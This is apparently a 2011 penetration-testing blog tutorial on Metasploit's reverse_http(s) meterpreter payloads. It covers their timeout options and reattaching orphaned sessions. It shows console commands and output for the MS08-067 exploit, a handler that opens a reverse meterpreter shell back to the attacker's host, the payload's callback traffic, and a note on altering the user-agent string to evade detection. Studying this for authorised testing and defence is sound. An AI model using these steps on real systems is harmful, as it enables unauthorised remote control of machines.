So we’ve all been unlucky enough to have a meterpreter session die on us, and then we’ve all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another.

No one I know in the White Hat scene likes to use any form of persistence with a payload; and you’d be nuts to use the bind_tcp option through fear of leaving it running. (I’ve heard horror stories of teams turning up to perform a test and finding netcat listeners running on the targets from the previous years test!)

On 29th June 2011 HD Moore released a new set of payloads, specifically the windows/meterpreter/reverse_http(s) payloads we’re interested in.

The most interesting thing about these new payloads is that they are no longer tied into a single TCP session; thus, if you’re connection dies they victim will attempt to reconnect to the listener automatically! Sweet!
This is probably even better news for those taking exams such as CHECK Team Leader and the like where wasting time re exploiting a box could be the difference between pass and fail.

And that’s it really, just use it the same way you would with reverse_tcp.
If you’re using exploit/multi/handler make sure to set the payload correctly to re-establish the session.?

Going on from this it’s important to understand when the payload will terminate. We wouldn’t want it to keep connecting back to the attacker for ever. There are some advanced options that we need to be aware of for the reverse_http and reverse_https payloads.

1
2
3
4
5
6
7
8
9
msf exploit(ms08_067_netapi) > show advanced
Payload advanced options (windows/meterpreter/reverse_http):
   Name           : SessionCommunicationTimeout
   Current Setting: 300
   Description    : The number of seconds of no activity before this session should be killed

   Name           : SessionExpirationTimeout
   Current Setting: 604800
   Description    : The number of seconds before this session should be forcible shut down

SessionExpirationTimeout simply tells the payload to terminate regardless of an open connection or not after this amount of time. Default = 1 week
SessionCommunicationTimeout simply tells the payload to terminate itself after a period of not being able to connect back to the attacker. Default = 5 minutes

There is another option (core_shutdown) that tells the payload to terminate if the session is exited through the metasploit console.

The major benefit of using the reverse_http and reverse_https payloads is that they follow the standard HTTP protocol and can traverse proxies.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf exploit(ms08_067_netapi) > exploit

[*] Started HTTP reverse handler on http://192.168.1.109:80/
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] 192.168.1.151:1449 Request received for /INITM...
[*] 192.168.1.151:1449 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 3 opened (192.168.1.109:80 -> 192.168.1.151:1449) at 2011-07-07 13:03:20 +0100

meterpreter > pwd
C:\
meterpreter >

SWEET!

If you’re unfortunate to have msfconsole die your end simply start the multi/exploit/handler with the correct payload (http/https)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://192.168.1.109:80/
[*] Starting the payload handler...
[*] 192.168.1.151:1710 Request received for /CONN_e7LiknUYlilI6RW8/...
[*] Incoming orphaned session CONN_e7LiknUYlilI6RW8, reattaching...
[*] Meterpreter session 1 opened (192.168.1.109:80 -> 192.168.1.151:1710) at 2011-07-07 13:11:00 +0100

meterpreter > pwd
C:\
meterpreter >

The interesting thing to note here is that this type of attack is going to be relatively easy for sys admins to notice.
Shown here is a sample of how the payload talks back to the attacker:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /CONN_e7LiknUYlilI6RW8/ HTTP/1.0
User-Agent: Meterpreter/Windows
Host: 192.168.1.109
Content-Length: 4
Pragma: no-cache

RECV

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: close
Server: Rex
Content-Length: 0

Simply monitoring your site inbound/outbound traffic for any user agent along the lines of Meterpreter/Windows should throw up some serious concerns if it’s seen. Unfortunately this should also pretty easy for a blackhat attacker to modify:

1
2
3
4
5
6
root@bt:/pentest/exploits/framework3# find . | xargs grep -i 'Meterpreter\/Windows' -s1
./external/source/meterpreter/source/server/server_setup.c- // Allocate the top-level handle
./external/source/meterpreter/source/server/server_setup.c: remote->hInternet = InternetOpen("Meterpreter/Windows", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
./external/source/meterpreter/source/server/server_setup.c- if (!remote->hInternet) {
--
root@bt:/pentest/exploits/framework3#

Leave a Reply